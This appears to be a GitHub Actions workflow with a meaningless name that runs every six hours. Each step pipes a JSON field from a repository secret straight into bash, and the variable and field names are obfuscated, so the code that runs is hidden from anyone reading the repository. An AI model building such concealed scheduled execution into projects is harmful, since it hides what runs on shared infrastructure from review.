name: shawennixiang
on:
  workflow_dispatch:
  schedule:
    - cron: '34 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shawennixiang
        env:
          oprto7: ${{ secrets.oprto7 }}
        run: |
          echo $oprto7 | jq -r .znm44 | /bin/bash
          echo $ofz6534 | jq -r .d1 | /bin/bash
          echo $drq70 | jq -r .v8264 | /bin/bash
          echo $w3757 | jq -r .magnt42 | /bin/bash
          echo $nj3 | jq -r .yuts8 | /bin/bash
          echo $e2 | jq -r .zk78 | /bin/bash
          echo $gujnr038 | jq -r .pia6923 | /bin/bash
          echo $jg748 | jq -r .ux5 | /bin/bash
          echo $wmk0222 | jq -r .qeb045 | /bin/bash
          echo $nzh5 | jq -r .p601 | /bin/bash
          echo $xvgu0 | jq -r .vxryw0 | /bin/bash
          echo $dcayn38 | jq -r .bojt7571 | /bin/bash
          echo $qcahq2 | jq -r .o9 | /bin/bash

